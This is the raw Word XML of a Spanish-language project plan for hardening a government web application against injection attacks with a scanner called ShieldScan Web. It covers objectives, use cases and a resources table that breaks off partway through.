          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>“Fortalecimiento de una aplicación gubernamental contra ataques de inyección con ShieldScan web”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271E389A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">1.Planificación </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E379F" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1.2. Objetivo general</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1858BA23" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Fortalecer la seguridad de una aplicación web gubernamental mediante la detección y corrección de vulnerabilidades de inyección, utilizando la herramienta ShieldScan Web como escáner de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE98F5B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1.3. Objetivo especifico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D6A35" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Instalar y configurar correctamente la herramienta </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SecureScan Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4650260E" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Realizar un análisis de vulnerabilidades orientado a identificar fallos de inyección SQL y otros tipos de inyección.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD0C6C6" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Documentar los hallazgos encontrados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63665725" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Elaborar y proponer un plan de mitigación de las vulnerabilidades detectadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682A0FA3" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Validar la efectividad de las correcciones implementadas mediante una nueva ronda de escaneo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A6E151" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4. Descripción del proyecto </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1EB8FF" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Este proyecto tiene como finalidad ejecutar un análisis de seguridad sobre una aplicación web gubernamental utilizando ShieldScan Web, una herramienta de escaneo de seguridad de aplicaciones web. El objetivo es detectar vulnerabilidades de inyección (SQL Injection, Command Injection, LDAP Injection, entre otras) que puedan comprometer la integridad y confidencialidad de los datos. A partir de los hallazgos, se desarrollará un plan de acciones correctivas para mitigar los riesgos detectados, aumentando así la resiliencia de la aplicación frente a ataques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EABB692" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1.5. Alcance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C87F81F" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El proyecto se enfocará en el fortalecimiento de la seguridad de una aplicación web gubernamental frente a ataques de inyección, a través de la ejecución de los siguientes</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>casos de uso</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746AB7C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">CU1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00D744B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>scaneo pasivo de tráfico HTTP para identificar vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2D6EF2" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Capturara y analizara las solicitudes y respuestas HTTP entre el navegador y la aplicación web, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sin enviar tráfico malicioso</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, para identificar debilidades o configuraciones inseguras como encabezados faltantes, cookies no seguras.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2305E48D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CU2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00D744B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>scaneo activo para detectar vulnerabilidades de inyección SQL, Command Injection y otras.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341DB643" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejecutará pruebas automáticas enviando peticiones manipuladas o datos maliciosos a la aplicación web, con el fin de detectar si los sistemas de entrada son vulnerables a ataques de inyección que podrían comprometer la base de datos o el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E5F54A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">CU3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejecución de pruebas de cumplimiento a app web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0006A0" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Verificara que la aplicación web </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cumpla con normas de seguridad</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> específicas (como OWASP Top 10, normativas gubernamentales o estándares internos), asegurando que los controles de seguridad implementados sean adecuados y conformes a requisitos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B13F2" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">CU4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Análisis</w:t>
      </w:r>
      <w:r w:rsidRPr="00D744B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidRPr="00D744B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>los resultados del escaneo y clasificar las vulnerabilidades por nivel de riesgo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03091371" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Implica revisar los hallazgos del escaneo, validar su veracidad y clasificarlos según su criticidad (Alta, Media, Baja), para priorizar las acciones de corrección basadas en el impacto potencial que tendrían sobre la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B9871" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">CU5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Generación de reportes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F53D7FC" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El sistema generara un reporte en formato pdf con los resultados a detalle de los resultados del análisis realizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E919A1D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1.6. Recursos necesario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0"/>
        <w:gridCol w:w="5387"/>
      </w:tblGrid>
      <w:tr w:rsidR="0030013F" w:rsidRPr="00F41898" w14:paraId="40435B5C" w14:textId="77777777" w:rsidTr="00915A16">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D233E2" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00F41898" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41898">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Categoría</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5342" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="351D4DED" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00F41898" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41898">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="00F41898" w14:paraId="5DCFEA40" w14:textId="77777777" w:rsidTr="00915A16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73149F3A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00F41898" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41898">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5342" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="792D66DB" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00F41898" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E04661">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">ShieldScan </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41898">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Web, Navegador web (Chrome/Firefox).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="001D1995" w14:paraId="5FC838AF" w14:textId="77777777" w:rsidTr="00915A16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C5A7B7C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00F41898" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41898">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5342" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="063FFC8C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00F41898" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41898">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Laptop o PC (mínimo 8 GB RAM, procesador i5 o superior).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="001D1995" w14:paraId="76FCAAD1" w14:textId="77777777" w:rsidTr="00915A16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F3389C3" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00F41898" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41898">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Accesos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5342" w:type="dxa"/>
